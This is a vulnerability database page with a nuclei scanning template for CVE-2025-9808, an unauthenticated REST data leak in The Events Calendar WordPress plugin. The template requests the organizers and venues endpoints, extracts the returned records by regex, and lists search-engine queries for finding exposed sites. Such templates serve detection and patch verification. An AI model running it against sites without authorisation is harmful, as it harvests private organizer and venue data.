Lucene search
K

The Events Calendar <= 6.15.2 - Information Disclosure

πŸ—“οΈΒ 04 Feb 2026Β 07:00:26Reported byΒ ProjectDiscoveryTypeΒ 
nuclei
Β nuclei
πŸ”—Β github.comπŸ‘Β 63Β Views

The Events Calendar plugin exposes REST data allowing unauthenticated disclosure of vendors and venues.

Related
Refs
Code
id: CVE-2025-9808

info:
  name: The Events Calendar <= 6.15.2 - Information Disclosure
  author: zer0p0int
  severity: medium
  description: |
    The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
  remediation: |
    Update to the latest version beyond 6.15.2
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
    - https://wpscan.com/plugin/the-events-calendar/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
      - "{{BaseURL}}/wp-json/tribe/events/v1/venues"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"rest_url","total")'
          - 'contains_any(body,"organizers","venues")'
          - 'contains(header,"application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: organizer_data
        group: 1
        regex:
          - '"organizers":\[(.*?)\],"rest_url"'

      - type: regex
        part: body
        name: venue_data
        group: 1
        regex:
          - '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation